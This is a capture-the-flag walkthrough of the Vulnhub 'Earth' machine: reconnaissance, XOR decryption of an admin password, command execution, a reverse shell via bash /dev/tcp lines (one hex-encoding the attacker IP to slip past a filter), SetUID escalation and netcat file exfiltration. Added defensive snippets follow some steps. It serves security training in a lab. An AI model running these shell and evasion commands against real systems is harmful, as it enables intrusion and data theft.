Article directory
- Vulnhub series target machine: The Planets: Earth
- 1. Information collection
  - 1.1 Host scanning
  - 1.2 Port scanning
  - 1.3 Directory brute-forcing
- 2. Vulnerability detection
  - 2.1 XOR decryption
  - 2.2 Decoding
- 3. Exploiting vulnerabilities
  - 3.1 Reverse shell
- 4. Privilege escalation
  - 4.1 nc file transfer
- Netcat (nc) file transfer
Vulnhub series target machine: The Planets: Earth
1. Information collection
1.1 Host Scan
arp-scan -l
1.2 Port Scan
nmap -p- -A 192.168.188.198
The target machine has ports 22, 80 and 443 open.
Visit the page in a browser.
The page returns a 400 Bad Request error, so add an entry for the host name to the hosts file so that it resolves to the target IP.
Visit http://earth.local/
1.3 Directory brute-forcing
dirsearch -u http://earth.local/ -e '*' -i 200
The /admin/login path was found; visiting it in a browser shows a login page.
Directory brute-forcing on the other site:
dirsearch -u https://terratest.earth.local/ -i 200
2. Vulnerability detection
Visit the robots.txt page.
Besides the usual entries that cannot be accessed, there is a Disallow: /testingnotes.* line at the end. Combining it with the file-extension patterns listed above it gives /testingnotes.txt, which can be accessed.
Translated, the page reads:
Notes on testing secure messaging systems:
- Using XOR encryption as the algorithm should be as secure as that used in RSA.
- Earth has confirmed that they received the message we sent.
- testdata.txt is used to test encryption.
- terra is used as the username for the admin portal.
To-do items:
- How do we securely send monthly keys to Earth? Or should we change keys once a week?
- Need to test different key lengths to prevent brute force. How long should a key be?
- Needs improvements to the messaging interface and admin panel interface, which is currently very basic.
At this point we know that the encryption algorithm is XOR, that the username is terra, and that a testdata.txt file is used to test the encryption.
Visit /testdata.txt
Translated, it reads as follows:
According to radiometric dating and other evidence, the Earth was formed 4.5 billion years ago. During the first billion years of Earth's history, life emerged in the oceans and began to influence the Earth's atmosphere and surface, leading to the proliferation of anaerobic and later aerobic organisms. Some geological evidence suggests that life may have emerged as early as 4.1 billion years ago.
Back on http://earth.local/ there are three strings of data below the page ("Previous Messages").
Use these three strings, with testdata.txt as the known plaintext, to try to find the password for the username terra.
2.1 XOR decryption
XOR, short for exclusive OR, is a logical operator. XOR is often used in data encryption and in checksum calculation.
XOR the Previous Messages with the contents of testdata.txt. Here we write a script to do the XOR decryption.
import binascii

# The three "Previous Messages" strings from http://earth.local/, as hex.
data1 = ("37090b59030f11060b0a1b4e000000000000431b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340"
         "e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a"
         "1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4"
         "f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18"
         "010a43220f1716010d40")
data2 = ("3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104"
         "b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e15"
         "0055011e100811430a59061417030d1117430910035506051611120b45")
data3 = ("2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041"
         "c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d"
         "4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1"
         "b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242"
         "150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a01060"
         "0124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12"
         "171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a")

# testdata.txt is the known plaintext; read it as bytes and convert to a hex string.
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

# XOR each message with the plaintext. Note that int() XOR lines the two values up on
# their least-significant (right-hand) end, so the result only corresponds to the start
# of the plaintext when the message and testdata.txt have the same length.
print(hex(int(data1, 16) ^ int(f, 16)))
print(hex(int(data2, 16) ^ int(f, 16)))
print(hex(int(data3, 16) ^ int(f, 16)))
The contents of the testdata.txt file:
Run the script; the three results are all hexadecimal strings.
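The reason the third message gives away the password is the one the testing notes overlook: XOR with a repeating key is a known-plaintext problem, and testdata.txt is the plaintext. The following is an added example, not the write-up's script, that works on bytes aligned from the start of the message (rather than on int() values, which align on the right) and recovers the repeating key from ciphertext and known plaintext. The function names, the sample plaintext and the key samplekey4demo are constructed for this demonstration.

```python
# Added example (not the write-up's own script): repeating-key XOR with a known
# plaintext. xor_bytes, repeating_key_xor, shortest_period, recover_key and
# decrypt_hex_message, plus PLAINTEXT and KEY, are constructed for this demo.
from itertools import cycle


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings position by position, aligned from the start and
    truncated to the shorter input. Unlike int(x, 16) ^ int(y, 16), which lines
    the values up on their least-significant end, this matches how a message is
    produced: ciphertext[i] = plaintext[i] ^ keystream[i]."""
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a key repeated to the length of the data.
    XOR is its own inverse, so the same call does both directions."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream: bytes) -> bytes:
    """Return the shortest prefix whose repetition reproduces the stream
    (the whole stream if it never repeats)."""
    n = len(stream)
    for p in range(1, n + 1):
        if all(stream[i] == stream[i % p] for i in range(n)):
            return stream[:p]
    return stream


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: ciphertext XOR plaintext is the key stream, and
    for a repeating key the stream's period is the key itself. This is why the
    note's claim that XOR is "as secure as RSA" fails once a plaintext is
    published next to its ciphertext."""
    return shortest_period(xor_bytes(ciphertext, known_plaintext))


def decrypt_hex_message(message_hex: str, key: bytes) -> str:
    """Decode a hex-encoded message with a repeating key (what the write-up does
    with hex(int(..) ^ int(..)), but aligned from the first byte)."""
    return repeating_key_xor(bytes.fromhex(message_hex), key).decode("utf-8", "replace")


# Constructed sample data, not the box's real messages.
PLAINTEXT = b"Earth formed over 4.5 billion years ago; life appeared within its first billion."
KEY = b"samplekey4demo"


def demo() -> bytes:
    """Encrypt the sample, then recover the key from ciphertext + plaintext."""
    ciphertext = repeating_key_xor(PLAINTEXT, KEY)
    return recover_key(ciphertext, PLAINTEXT)


if __name__ == "__main__":
    ct = repeating_key_xor(PLAINTEXT, KEY)
    print("ciphertext:   ", ct.hex())
    print("recovered key:", demo())
    print("decrypted:    ", decrypt_hex_message(ct.hex(), KEY))
```

For the box's data the same idea applies: xor_bytes(bytes.fromhex(data3), open('testdata.txt', 'rb').read()) yields the repeated key directly, without the right-alignment caveat of the int() approach.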
2.2 Decoding
Use the decoding tool in utools to decode the three results.
First string:
Second string:
Third string:
The first two contain nothing important; the third is the string earthclimatechangebad4humans repeated over and over.
Try logging in with this username and password:
terra earthclimatechangebad4humans
Login successful.
Looking at the page, it turns out that commands can be executed.
Command Execution Vulnerability
Check whether there is a flag file; one is found at /var/earth_web/user_flag.txt.
View the /var/earth_web/user_flag.txt file.
This gives the first flag.
3. Vulnerability exploitation
3.1 Reverse shell
Now that we can execute commands, we can get a reverse shell.
bash -i &> /dev/tcp/192.168.188.157/8888 0>&1
The attempt shows that the remote connection is prohibited.
In this case, you can hex-encode the IP address or base64-encode the entire command. Here I choose to hex-encode the IP address.
Convert the dotted-decimal IP address to its hexadecimal form.
bash -i >& /dev/tcp/0XC0A8BC9D/8888 0>&1
Then listen on port 8888 on the Kali host (the listener only needs to accept the connection; the shell is supplied by the target side):
nc -lnvp 8888
The reverse shell connects successfully.
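The filter on the box blocked the dotted form of the address but not the hex form, which shows that it compared text rather than addresses. The canonicaliser below is an added example, not part of the write-up, of the check a defender writing such a filter, or reviewing logs, would want: it maps the dotted, decimal and hex spellings of an IPv4 address (0XC0A8BC9D is 192.168.188.157) to one canonical form so they can be compared by value. The function names are constructed for this example.

```python
# Added example (not from the write-up): canonicalising the numeric IPv4
# spellings that a hostname resolver accepts, so that a filter or a log
# search compares addresses rather than strings. Names are constructed.
import ipaddress
import re


def ipv4_to_forms(dotted: str) -> dict:
    """Return the dotted address together with its single-number decimal
    and hex spellings (the hex one is what the write-up used)."""
    n = int(ipaddress.IPv4Address(dotted))
    return {"dotted": str(ipaddress.IPv4Address(n)),
            "decimal": str(n),
            "hex": f"0x{n:08X}"}


def canonical_ipv4(token: str) -> str:
    """Map a dotted ('192.168.188.157'), decimal ('3232283805') or hex
    ('0XC0A8BC9D') address to dotted-quad form; raise ValueError otherwise."""
    token = token.strip()
    if re.fullmatch(r"0[xX][0-9a-fA-F]{1,8}", token):
        n = int(token, 16)
    elif re.fullmatch(r"[0-9]{1,10}", token):
        n = int(token, 10)
    else:
        # ipaddress validates the dotted form and rejects anything else.
        return str(ipaddress.IPv4Address(token))
    if n > 0xFFFFFFFF:
        raise ValueError(f"{token!r} does not fit in 32 bits")
    return str(ipaddress.IPv4Address(n))


def same_host(a: str, b: str) -> bool:
    """True when two address tokens denote the same host, however spelled."""
    return canonical_ipv4(a) == canonical_ipv4(b)


if __name__ == "__main__":
    print(ipv4_to_forms("192.168.188.157"))
    for spelling in ("192.168.188.157", "0XC0A8BC9D", "3232283805"):
        print(f"{spelling:>16} -> {canonical_ipv4(spelling)}")
```

A blocklist that canonicalises before comparing does not care which spelling the command used; a blocklist that matches the literal dotted string does, which is exactly the gap the write-up walked through.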
View the current user's permissions.
They are low, so try to escalate privileges.
4. Privilege escalation
List files with the SetUID bit set:
find / -perm -u=s -type f 2>/dev/null
Command analysis:
- -perm -u=s: match files by their permission bits. -perm specifies the permissions to match, u selects the owner (user) bits, and s is the SetUID bit. SetUID (Set User ID) is a special permission bit: when a user executes the file, it runs with the identity of the file's owner.
- -type f: match regular files only (f means file).
- 2>/dev/null: redirect error output (stderr) to /dev/null, i.e. discard error messages.
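An odd SetUID binary such as reset_root is what this step is looking for, and the same listing is what a defender compares against a baseline to notice one appearing. The following is an added example, not from the write-up, that reproduces find / -perm -u=s -type f 2>/dev/null in Python (lstat so symlinks are not followed, unreadable entries skipped) and reports drift against a baseline set. The function names and the temporary directory tree it builds, including a file called reset_root as a stand-in, are constructed for this demonstration.

```python
# Added example (not from the write-up): Python equivalent of
# `find / -perm -u=s -type f 2>/dev/null` plus a baseline comparison.
# find_suid_files, suid_drift, _make_suid and demo, and the sample tree,
# are constructed for this demonstration.
import os
import stat
import tempfile


def find_suid_files(root: str) -> set:
    """Walk root and return regular files with the SetUID bit set.
    lstat() does not follow symlinks (find's -type f behaviour), and
    unreadable entries are skipped, which is what 2>/dev/null hides."""
    found = set()
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def suid_drift(baseline: set, current: set) -> dict:
    """Report SetUID files that appeared or disappeared since the baseline."""
    return {"added": sorted(current - baseline),
            "removed": sorted(baseline - current)}


def _make_suid(path: str) -> None:
    """Create a placeholder file and set mode rwsr-xr-x (4755)."""
    with open(path, "wb") as fh:
        fh.write(b"#!/bin/sh\n")  # content is irrelevant; only the mode bits matter
    os.chmod(path, 0o4755)


def demo() -> dict:
    """Constructed tree: two expected SetUID files form the baseline, then a
    new one appears. Returns the baseline and the drift, paths relative to root."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "usr", "bin")
        os.makedirs(bindir)
        for name in ("passwd", "su"):
            _make_suid(os.path.join(bindir, name))
        with open(os.path.join(bindir, "ls"), "wb"):  # ordinary, non-SetUID file
            pass
        baseline = {os.path.relpath(p, root) for p in find_suid_files(root)}
        _make_suid(os.path.join(bindir, "reset_root"))  # constructed stand-in
        current = {os.path.relpath(p, root) for p in find_suid_files(root)}
        report = suid_drift(baseline, current)
        report["baseline"] = sorted(baseline)
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real host the baseline is taken from a known-good image and stored off-box; the comparison then runs periodically and any entry in "added" is worth explaining.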
reset_root appears in the list; try to run it.
It fails to run.
4.1 nc file transfer
Use nc to transfer the file to Kali.
On Kali, start listening with:
nc -nlvp 7788 > reset_root
On the target machine, enter:
nc 192.168.188.157 7788 < /usr/bin/reset_root
Command analysis:
- Use the Netcat (nc) tool to send the /usr/bin/reset_root file to port 7788 on the receiving host, whose IP address is 192.168.188.157.
strace debugging tool
Use strace to trace what reset_root does while running. If it is not installed, install it:
sudo apt install strace
Give reset_root execute permission and run it under strace:
chmod +x reset_root
strace ./reset_root
Command analysis:
- strace is a tool for tracing a process's system calls and signals.
- strace: starts the strace tool; ./reset_root: the executable file to run under it.
The trace shows that execution failed because three files or directories were missing.
Create these three files in the target shell.
In the target machine's terminal, create them:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
After creating them, run reset_root again.
It prints the root password: Earth
Root access is obtained and with it the final flag.
Netcat (nc) file transfer
File transfer with Netcat (nc) lets you move files quickly between computers. Netcat is a network tool that can create network connections and send and receive data.
Detailed steps:
- Start listening on the receiving end:
nc -l -p <port> > received_file
Run this on the receiving end to listen on the specified port. The -l parameter selects listening mode and -p specifies the port number. All incoming data is redirected into the received_file file.
- Send the file from the sending side:
nc <receiver_ip> <receiver_port> < file_to_send
Run this on the sending side. <receiver_ip> is the IP address of the receiving end, <receiver_port> is the port opened on the receiving end, and file_to_send is the name or path of the file to send. Netcat sends the contents of the file to the receiving end over the network.
- The receiving end receives the file:
The receiving end writes the data to the file specified as received_file. You can find the file in the receiving end's file system and process it further.
Make sure of the following when using it:
- There is a network connection between the sender and receiver, and the network settings are correct.
- The receiving port is not blocked by a firewall or other network security device.
- Both the sender and receiver have sufficient permissions to read and write the file.
- The file path and file name are correct.
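The nc exchange above is a bare TCP stream: the receiver has no length, checksum or sender identity to go on, and the only end-of-file signal is the sender closing its side. The following is an added example, not part of the original article, that reproduces both sides with plain sockets on loopback and adds the check a practitioner wants after an nc transfer, a hash comparison of the sent and received files. The function names, the temporary files and the 1 MiB random sample are constructed for this demonstration, and it assumes loopback networking is available.

```python
# Added example (not from the article): both sides of
# `nc -l -p <port> > received_file` / `nc <ip> <port> < file_to_send`
# as plain sockets, followed by a SHA-256 comparison. sha256_of,
# receive_file, send_file and transfer_demo are constructed names.
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_file(listener: socket.socket, dest_path: str) -> str:
    """Receiver side: accept one connection and write everything it sends to
    dest_path until the peer closes (recv returns b''). Returns the digest."""
    conn, _peer = listener.accept()
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            out.write(chunk)
    return sha256_of(dest_path)


def send_file(host: str, port: int, src_path: str) -> str:
    """Sender side: connect, stream the file, then shut down the write side so
    the receiver sees EOF (nc does this when stdin is exhausted)."""
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as fh:
        s.sendfile(fh)
        s.shutdown(socket.SHUT_WR)
    return sha256_of(src_path)


def transfer_demo() -> dict:
    """Run both sides on loopback with a constructed 1 MiB file and compare
    digests. Returns the digests, the received size and whether they match."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "file_to_send")
        dst = os.path.join(d, "received_file")
        with open(src, "wb") as fh:
            fh.write(os.urandom(1024 * 1024))  # constructed sample content
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("127.0.0.1", 0))  # port 0: the OS picks a free port
        listener.listen(1)
        port = listener.getsockname()[1]
        result = {}
        t = threading.Thread(target=lambda: result.update(received=receive_file(listener, dst)))
        t.start()
        result["sent"] = send_file("127.0.0.1", port, src)
        t.join()
        listener.close()
        result["match"] = "received" in result and result["sent"] == result["received"]
        result["size"] = os.path.getsize(dst)
        return result


if __name__ == "__main__":
    for key, value in transfer_demo().items():
        print(f"{key}: {value}")
```

With the real tools the same check is sha256sum on both hosts after the transfer; a mismatch usually means the sender was interrupted before EOF or the listener accepted a different connection than intended.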